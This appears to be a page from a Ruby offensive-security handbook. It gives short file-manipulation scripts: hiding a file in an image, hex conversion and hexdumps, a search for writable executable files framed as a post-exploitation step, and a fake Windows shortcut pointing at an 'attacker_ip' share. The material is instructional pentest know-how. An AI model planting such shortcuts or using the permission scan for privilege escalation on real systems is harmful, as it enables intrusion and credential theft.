File manipulation

Simple Steganography

Simple script to hide a file file.pdf in an image image.png then write it into steg.png image which is originally the image.png Then, it recovers the file.pdf from steg.png to hola.pdf.
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
file1, file2 = ARGV
4
sec_file = File.read file1 # 'file.pdf'
5
nor_file = File.read file2 # 'image.png'
6
sep = '*------------------------*'
7
one_file = [nor_file, sep, sec_file]
8
9
# Write sec_file, sep, nor_file into steg.png
10
File.open("steg.png", 'wb') do |stg|
11
one_file.each do |f|
12
stg.puts f
13
end
14
end
15
16
# Read steg.png to be like "one_file" array
17
recov_file = File.read('steg.png').force_encoding("BINARY").split(sep).last
18
# Write sec_file to hola.pdf
19
File.open('hola.pdf', 'wb') {|file| file.print recov_file}
Copied!
Note: This has nothing to do with bypassing AV.

Simple Binary file to Hex

hex-simple.rb
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
# Simple file to hex converter script
4
#
5
file_name = ARGV[0]
6
7
file = File.open(file_name , 'rb')
8
file2hex = file.read.each_byte.map { |b| '\x%02x' % b }.join # b.to_s(16).rjust(2, '0')
9
10
puts file2hex
Copied!
1
ruby hex-simple.rb ../assembly/hellolinux
Copied!
Or in one command line
1
ruby -e "puts File.open('hellolinux').read.each_byte.map { |b| '\x%02X' % b }.join"
Copied!
return
1
\x7F\x45\x4C\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\x80\x80\x04\x08\x34\x00\x00\x00\xCC\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xA2\x00\x00\x00\xA2\x00\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xA4\x00\x00\x00\xA4\x90\x04\x08\xA4\x90\x04\x08\x0E\x00\x00\x00\x0E\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\xB9\xA4\x90\x04\x08\xBA\x0D\x00\x00\x00\xCD\x80\xB8\x01\x00\x00\x00\xBB\x00\x00\x00\x00\xCD\x80\x00\x00\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x21\x0A\x00\x2E\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2E\x74\x65\x78\x74\x00\x2E\x64\x61\x74\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x80\x80\x04\x08\x80\x00\x00\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xA4\x90\x04\x08\xA4\x00\x00\x00\x0E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB2\x00\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
Copied!
Note if want to change the hex prefix from \x to anything, just change '\x%x' to whatever you want, or remove it!.

Simple Hexdump

hexdump.rb
1
#!/usr/bin/env ruby
2
#
3
# Source: http://c2.com/cgi/wiki?HexDumpInManyProgrammingLanguages
4
#
5
def hexdump(filename, start = 0, finish = nil, width = 16)
6
ascii = ''
7
counter = 0
8
print '%06x ' % start
9
File.open(filename).each_byte do |c|
10
if counter >= start
11
print '%02x ' % c
12
ascii << (c.between?(32, 126) ? c : ?.)
13
if ascii.length >= width
14
puts ascii
15
ascii = ''
16
print '%06x ' % (counter + 1)
17
end
18
end
19
throw :done if finish && finish <= counter
20
counter += 1
21
end rescue :done
22
puts ' ' * (width - ascii.length) + ascii
23
end
24
25
if $0 == __FILE__
26
if ARGV.empty?
27
hexdump $0
28
else
29
filename = ARGV.shift
30
hexdump filename, *(ARGV.map {|arg| arg.to_i })
31
end
32
end
Copied!
1
ruby hexdump.rb hellolinux
Copied!
return
1
000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 .ELF............
2
000010 02 00 03 00 01 00 00 00 80 80 04 08 34 00 00 00 ............4...
3
000020 cc 00 00 00 00 00 00 00 34 00 20 00 02 00 28 00 ........4. ...(.
4
000030 04 00 03 00 01 00 00 00 00 00 00 00 00 80 04 08 ................
5
000040 00 80 04 08 a2 00 00 00 a2 00 00 00 05 00 00 00 ................
6
000050 00 10 00 00 01 00 00 00 a4 00 00 00 a4 90 04 08 ................
7
000060 a4 90 04 08 0e 00 00 00 0e 00 00 00 06 00 00 00 ................
8
000070 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
9
000080 b8 04 00 00 00 bb 01 00 00 00 b9 a4 90 04 08 ba ................
10
000090 0d 00 00 00 cd 80 b8 01 00 00 00 bb 00 00 00 00 ................
11
0000a0 cd 80 00 00 48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 ....Hello, World
12
0000b0 21 0a 00 2e 73 68 73 74 72 74 61 62 00 2e 74 65 !...shstrtab..te
13
0000c0 78 74 00 2e 64 61 74 61 00 00 00 00 00 00 00 00 xt..data........
14
0000d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
15
0000e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
16
0000f0 00 00 00 00 0b 00 00 00 01 00 00 00 06 00 00 00 ................
17
000100 80 80 04 08 80 00 00 00 22 00 00 00 00 00 00 00 ........".......
18
000110 00 00 00 00 10 00 00 00 00 00 00 00 11 00 00 00 ................
19
000120 01 00 00 00 03 00 00 00 a4 90 04 08 a4 00 00 00 ................
20
000130 0e 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 ................
21
000140 00 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00 ................
22
000150 00 00 00 00 b2 00 00 00 17 00 00 00 00 00 00 00 ................
23
000160 00 00 00 00 01 00 00 00 00 00 00 00 ............
Copied!

Finding weak file permissions

One of the important task to do post exploitation is find weak executable file permissions which might be executed buy root/administrator user trying to elevate our privileges on the system. At the same time, our scripts must be applicable for all systems
find777.rb
1
# KING SABRI | @KINGSABRI
2
# Find all executable, writable files in the path
3
#
4
require 'find'
5
6
path = ARGV[0]
7
8
search = Find.find(path)
9
10
def wx_file(search)
11
search.select do |file|
12
File.file?(file) && File.executable?(file) && File.writable?(file)
13
end
14
end
15
16
puts wx_file search
Copied!
You can search for read, write, execute permissions, so your iteration block will be like
1
search.select do |file|
2
File.stat(file).mode.to_s(8)[-3..-1].to_i == 777
3
end
Copied!

Create Fake Windows shortcut

Install win32-shortcut gem
1
gem install win32-shortcut
Copied!
Note: this example works only on windows since it uses Windows APIs
1
# KING SABRI | @KINGSABRI
2
# gem install win32-shortcut
3
require 'win32/shotcut'
4
include Win32
5
6
Shortcut.new() do |s|
7
s.description = 'Rubyfu'
8
s.path = '\\attacker_ip\rubyfu.png'
9
s.show_cmd = Shortcut::SHOWNORMAL
10
s.icon_location = 'notepad.exe'
11
end
Copied!
Last modified 3yr ago